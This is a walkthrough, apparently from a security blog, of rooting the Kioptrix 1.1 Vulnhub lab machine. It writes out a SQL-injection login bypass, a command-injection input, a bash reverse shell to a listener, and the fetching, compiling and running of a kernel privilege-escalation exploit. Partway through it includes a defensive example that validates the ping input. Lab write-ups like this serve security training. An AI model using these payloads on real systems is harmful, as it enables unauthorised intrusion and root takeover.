Kioptrix-1.1 Walkthrough Vulnhub Machine
Hello everyone, welcome back to another walkthrough, this time on Kioptrix 1.1 from the Vulnhub machine series. It’s the continuation of the previous Kioptrix-1 walkthrough; check the link below for part 1.
Enough intro, so let’s begin.
Step 1: Download and install the Kioptrix 1.1 machine (link below).
Kioptrix: Level 1.1 (2) ~ VulnHub
Step 2: Finding the IP address
sudo netdiscover -r 192.168.1.0/24
Step 3: Put the IP in your browser and check whether a web server is running
We have a login page. Let’s try to bypass authentication using SQLi payloads. (I used Burp Suite to automate the brute-forcing, with a random SQLi payload list from Google.)
admin'#
After entering admin'# in the input field, I was able to log in to the website. Enter your local machine’s IP address to ping the network (your IP may be different).
Here we got the following output.
Let’s try command injection:
<your IP>;ls
Woohoo! We are able to run arbitrary commands in the input box.
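The ping form is injectable because the submitted value reaches a shell, where `;` ends the ping command and starts a new one. Below is an added example (not the target application's code, which this walkthrough does not show) of how such a handler can validate the field and avoid the shell entirely; the function names and the Python setting are assumptions made for illustration.

```python
import ipaddress
import subprocess

PING_COUNT = "3"  # assumed packet count for this sketch


def build_ping_argv(user_input):
    """Return the argv for ping, or raise ValueError if the input is not an IPv4 address."""
    candidate = user_input.strip()
    # IPv4Address accepts a dotted quad only: ';', '|', '&', '$', spaces,
    # embedded newlines and a leading '-' (a ping option) all fail here.
    address = ipaddress.IPv4Address(candidate)  # AddressValueError is a ValueError
    return ["ping", "-c", PING_COUNT, str(address)]


def ping(user_input):
    """Ping a validated address without ever invoking a shell."""
    argv = build_ping_argv(user_input)
    # List form with the default shell=False: the address is one argv
    # element, so nothing in it can be parsed as shell syntax.
    result = subprocess.run(argv, capture_output=True, text=True, timeout=15)
    return result.stdout


def is_rejected(user_input):
    """True when the handler would refuse the value before running anything."""
    try:
        build_ping_argv(user_input)
        return False
    except ValueError:
        return True


# Constructed sample form values: one legitimate address, then malformed ones.
SAMPLES = [
    "192.168.1.3",
    "192.168.1.3;ls",
    "192.168.1.3 && id",
    "-f 192.168.1.3",
    "192.168.1.3\nls",
    "$(id)",
]

if __name__ == "__main__":
    for value in SAMPLES:
        verdict = "rejected" if is_rejected(value) else build_ping_argv(value)
        print(repr(value), "->", verdict)
```

Validation and the argument-list call are independent layers: either one alone stops the `;ls` input, and keeping both means a later change to one does not reopen the hole.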
So, let’s set up a netcat listener and enter a bash payload in the input field.
nc -nvlp 4444
You can copy the payload from here: Reverse Shell Cheat Sheet | pentestmonkey
;bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
After clicking the submit button, we are able to establish a connection and we get a shell (refer to the images below).
Here we can see that an outdated Linux version is running and that we are not the root user. Let’s try to escalate our privileges to root.
With some simple Googling, I found an exploit on Exploit-DB written in C.
I downloaded the exploit to my local machine and then set up a simple HTTP server.
service apache2 start
python -m http.server
We need to copy the exploit to the bash shell, so head back to the bash shell and copy the exploit using the command below.
wget http://192.168.1.3/9542.c
I copied the exploit to the /tmp folder; now let’s compile and run it.
gcc 9542.c -o exploit && ./exploit
That’s it..!! We have successfully escalated our privileges and rooted the machine.
Hope you found this walkthrough easy and interesting, see you in the next article.
Do follow me on Twitter at https://twitter.com/chinmay_talad for more cybersecurity resources and walkthroughs.